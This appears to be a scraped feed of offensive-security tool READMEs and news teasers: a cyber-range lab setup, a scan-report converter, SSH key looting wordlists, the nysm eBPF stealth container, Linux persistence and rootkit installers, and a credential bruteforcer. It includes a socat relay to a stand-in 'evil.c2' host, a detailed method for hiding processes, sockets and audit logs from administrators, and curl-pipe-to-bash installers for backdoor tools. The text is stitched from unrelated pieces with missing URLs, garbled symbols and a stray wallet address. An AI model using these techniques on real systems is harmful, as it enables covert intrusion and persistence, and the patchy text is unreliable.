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CSAF - Cyber Security Awareness Framework

By: Zion3R

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.



  • Docker
  • Docker-compose



  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free


  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above


Clone the repository

git clone

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate wazuh ssl certificate

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reason you should set env like this first

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

For example

docker-compose --profile=attackdefenselab up -d


Exposed Ports

An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access internal network with proxy socks5

  • curl --proxy socks5://ipaddress:6080
  • curl --proxy socks5://ipaddress:7080
  • curl --proxy socks5://ipaddress:8080

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://mail.server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • http://phising.lab/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username:, default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address


  • attack.lab
  • phising.lab
  • server.lab
  • mail.server.lab
  • gophish.lab
  • infectionmonkey.lab
  • mongodb.lab
  • purpleops.lab
  • caldera.lab


  • defense.lab
  • dvwa.lab
  • wackopicko.lab
  • juiceshop.lab
  • gitea.lab
  • infectionmonkey.lab
  • purpleops.lab
  • caldera.lab


  • server.lab
  • mail.server.lab
  • mariadb.lab
  • dvwa.lab
  • dvwa-monitor.lab
  • dvwa-modsecurity.lab
  • monitor.lab
  • wazuh-manager.lab
  • wazuh-indexer.lab
  • wazuh-dashboard.lab
  • splunk.lab


  • defense.lab
  • wackopicko.lab


  • monitor.lab
  • wazuh-manager.lab
  • wazuh-dashboard.lab
  • splunk.lab


  • attack.lab
  • dvwa-modsecurity.lab
  • wackopicko.lab


This Docker Compose application is released under the MIT License. See the LICENSE file for details.

Sr2T - Converts Scanning Reports To A Tabular Format

By: Zion3R

Scanning reports to tabular (sr2t)

This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

  1. Nmap (XML);
  2. Nessus (XML);
  3. Nikto (XML);
  4. Dirble (XML);
  5. Testssl (JSON);
  6. Fortify (FPR).


This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.


  1. argparse (dev-python/argparse);
  2. prettytable (dev-python/prettytable);
  3. python (dev-lang/python);
  4. xlsxwriter (dev-python/xlsxwriter).


Using Pip:

pip install --user sr2t


You can use sr2t in two ways:

  • When installed as package, call the installed script: sr2t --help.
  • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]

Converting scanning reports to a tabular format

optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
--nmap-services Specify to ouput a supplemental list of detected
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).

specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.


A few examples


To produce an XLSX format:

$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nessus example/nessus.nessus
| host | port | plugin id | plugin name | severity | annotations |
| | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| | 445 | 57608 | SMB Signing not required | 2 | X |

Or to output a CSV file:

$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X,3389,45411,SSL Certificate with Wrong Hostname,2,X,443,45411,SSL Certificate with Wrong Hostname,2,X,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X,3389,57582,SSL Self-Signed Certificate,2,X,3389,51192,SSL Certificate Cannot Be Trusted,2,X,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X,3389,45411,SSL Certificate with Wrong Hostname,2,X,443,45411,SSL Certificate with Wrong Hostname,2,X,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X,3389,57582,SSL Self-Signed Certificate,2,X,3389,51192,SSL Certificate Cannot Be Trusted,2,X,44 5,57608,SMB Signing not required,2,X


To produce an XLSX format:

$ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
| | X | | X | X | X | X | X | X | | |
| | | | | X | X | | X | X | X | X |
| | | | | X | X | | X | X | X | X |
| | | X | | | | | | | | |
| | | | | X | X | | X | X | X | X |

Nmap Services:
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| | 53 | tcp | domain | open |
| | 88 | tcp | kerberos-sec | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| | 389 | tcp | ldap | open |
| | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 5800 | tcp | vnc-http | open |
| | 5900 | tcp | vnc | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 5800 | tcp | vnc-http | open |
| | 5900 | tcp | vnc | open |
| | 80 | tcp | http | open |
| | 135 | tcp | msrpc | open |
| | 139 | tcp | netbios-ssn | open |
| | 445 | tcp | microsoft-ds | open |
| | 3389 | tcp | ms-wbt-server | open |
| | 5800 | tcp | vnc-http | open |
| | 5900 | tcp | vnc | open |

Or to output a CSV file:

$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900,X,,X,X,X,X,X,X,,,,,,X,X,,X,X,X,X,,,,X,X,,X,X,X,X,,X,,,,,,,,,,,,X,X,,X,X,X,X


To produce an XLSX format:

$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce an text tabular format to stdout:

$ sr2t --nikto example/nikto.xml
| target ip | target hostname | target port | description | annotations |
| | | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| | | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| | | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |

Or to output a CSV file:

$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations,,80,The anti-clickjacking X-Frame-Options header is not present.,X,,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X,,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X


To produce an XLSX format:

$ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --dirble example/dirble.xml
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | fa lse | | X |
| | 0 | 0 | false | false | false | | X |
| | 0 | 0 | false | false | false | | X |

Or to output a CSV file:

$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X,0,0,false,false,false,,X


To produce an XLSX format:

$ sr2t --testssl example/testssl.json -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --testssl example/testssl.json
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
| | 443 | X | X | X | X | X | X | X | X |

Or to output a CSV file:

$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard,443,X,X,X,X,X,X,X,X


To produce an XLSX format:

$ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --fortify example/fortify.fpr
| | type | subtype | severity | confidence | annotations |
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |

Or to output a CSV file:

$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X


  • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp

SSH-Private-Key-Looting-Wordlists - A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names

By: Zion3R

SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.

LFI for Lateral Movement? Gain SSH Access?

SSH Private Key Looting Wordlists πŸ”’πŸ—οΈ

This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.

Wordlist Files πŸ“
  • ssh-priv-key-loot-common.txt: Default and common naming conventions for SSH private key files.
  • ssh-priv-key-loot-medium.txt: Probable file names without backup file extensions.
  • ssh-priv-key-loot-extended.txt: Probable file names with backup file extensions.
  • ssh-priv-key-loot-*_w_gui.txt: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.

Usage πŸš€

These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.

Acknowledgements πŸ™

This wordlist repository was inspired by John Hammond in his vlog "Don't Forget This One Hacking Trick."

Disclaimer ⚠️

Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.

Cybersecurity Agencies Warn Ubiquiti EdgeRouter Users of APT28's MooBot Threat

In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was&nbsp;felled by law enforcement&nbsp;as part of an operation codenamed Dying Ember. The botnet, named MooBot, is said to have been used by a Russia-linked threat actor known as

Cybercriminals Weaponizing Open-Source SSH-Snake Tool for Network Attacks

A recently open-sourced network mapping tool called&nbsp;SSH-Snake&nbsp;has been repurposed by threat actors to conduct malicious activities. "SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network," Sysdig researcher Miguel HernΓ‘ndez&nbsp;said. "The worm automatically searches through known credential

Nysm - A Stealth Post-Exploitation Container

By: Zion3R

A stealth post-exploitation container.


With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:

  • bpftool
  • bpflist-bpfcc
  • ps
  • top
  • sockstat
  • ss
  • rkhunter
  • chkrootkit
  • lsof
  • auditd
  • etc...

All these tools go blind to what goes through nysm. It hides:

  • New eBPF programs
  • New eBPF maps ️
  • New eBPF links ο”—
  • New Auditd generated logs ο“°
  • New PIDs οͺͺ
  • New sockets ο”Œ

Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.




sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux headers

cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h


cd ./nysm/src/


nysm is a simple program to run before the intended command:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message


Run a hidden bash:

./nysm bash

Run a hidden ssh and remove ./nysm:

./nysm -r ssh user@domain

Run a hidden socat as a daemon and remove ./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

How it works

In general

As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

To differentiate nysm events from the others, everything runs inside a seperated PID namespace.

Hide eBPF objects

bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

Hide Auditd logs

Auditd receives its logs from recvfrom() which stores its messages in a buffer.

If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header by 0.


Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

As getdents64() requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.

Hide sockets

Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer and the returned value is the length of all these messages combined.

Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

These are collected from the connect() and bind() calls.


Even with the best effort, nysm still has some limitations.

  • Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

  • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

  • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

  • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

  • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.

D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R

Demonized Shell is an Advanced Tool for persistence in linux.


git clone
cd D3m0n1z3dShell
chmod +x
sudo ./

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L | tar xz && cd D3m0n1z3dShell-main && sudo ./

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s -o /tmp/ && sudo bash /tmp/

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.


If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity


We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.

New Terrapin Flaw Could Let Attackers Downgrade SSH Protocol Security

Security researchers from Ruhr University Bochum have discovered a vulnerability in the Secure Shell (SSH) cryptographic network protocol that could allow an attacker to downgrade the connection's security by breaking the integrity of the secure channel. Called&nbsp;Terrapin&nbsp;(CVE-2023-48795, CVSS score: 5.9), the exploit has been described as the "first ever practically exploitable prefix

Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

By: Zion3R

Legba is a multiprotocol credentials bruteforcer / password sprayer and enumerator built with Rust and the Tokio asynchronous runtime in order to achieve better performances and stability while consuming less resources than similar tools (see the benchmark below).

For the building instructions, usage and the complete list of options check the project Wiki.

Supported Protocols/Features:

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace), Cassandra/ScyllaDB, DNS subdomain enumeration, FTP, HTTP (basic authentication, NTLMv1, NTLMv2, multipart form, custom requests with CSRF support, files/folders enumeration, virtual host enumeration), IMAP, Kerberos pre-authentication and user enumeration, LDAP, MongoDB, MQTT, Microsoft SQL, MySQL, Oracle, PostgreSQL, POP3, RDP, Redis, SSH / SFTP, SMTP, STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ), TCP port scanning, Telnet, VNC.


Here's a benchmark of legba versus thc-hydra running some common plugins, both targeting the same test servers on localhost. The benchmark has been executed on a macOS laptop with an M1 Max CPU, using a wordlist of 1000 passwords with the correct one being on the last line. Legba was compiled in release mode, Hydra compiled and installed via brew formula.

Far from being an exhaustive benchmark (some legba features are simply not supported by hydra, such as CSRF token grabbing), this table still gives a clear idea of how using an asynchronous runtime can drastically improve performances.

Test Name Hydra Tasks Hydra Time Legba Tasks Legba Time
HTTP basic auth 16 7.100s 10 1.560s (οš€ 4.5x faster)
HTTP POST login (wordpress) 16 14.854s 10 5.045s (οš€ 2.9x faster)
SSH 16 7m29.85s * 10 8.150s (οš€ 55.1x faster)
MySQL 4 ** 9.819s 4 ** 2.542s (οš€ 3.8x faster)
Microsoft SQL 16 7.609s 10 4.789s (οš€ 1.5x faster)

* While this result would suggest a default delay between connection attempts used by Hydra. I've tried to study the source code to find such delay but to my knowledge there's none. For some reason it's simply very slow.
** For MySQL hydra automatically reduces the amount of tasks to 4, therefore legba's concurrency level has been adjusted to 4 as well.


Legba is released under the GPL 3 license. To see the licenses of the project dependencies, install cargo license with cargo install cargo-license and then run cargo license.

Warning: Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining

Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks. "Threat actors can also choose to install only scanners and sell the breached IP and account credentials on

DynastyPersist - A Linux Persistence Tool!

By: Zion3R

  • A Linux persistence tool!

  • A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.


  1. SSH Key Generation: Automatically generates SSH keys for covert access.

  2. Cronjob Persistence: Sets up cronjobs for scheduled persistence.

  3. Custom User with Root: Creates a custom user with root privileges.

  4. RCE Persistence: Achieves persistence through remote code execution.

  5. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.

  6. Bashrc Persistence: Modifies user-specific shell initialization files for persistence.

  7. Systemd Service for Root: Sets up a systemd service for achieving root persistence.

  8. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.

  9. Backdooring Message of the Day / Header: Backdoors system message display for covert access.

  10. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.


  1. Clone this repository to your local machine:

    git clone
  2. One linear

    curl -sSL | bash


For support, email or join our Discord server.

  • Discord:

Thank You!

Experts Uncover Passive Method to Extract Private RSA Keys from SSH Connections

A new study has demonstrated that it's possible for passive network attackers to obtain private RSA host keys from a vulnerable SSH server by observing when naturally occurring computational faults that occur while the connection is being established. The Secure Shell (SSH) protocol is a method for securely transmitting commands and logging in to a computer over an unsecured network. Based on a

PoC Exploit Released for Critical VMware Aria's SSH Auth Bypass Vulnerability

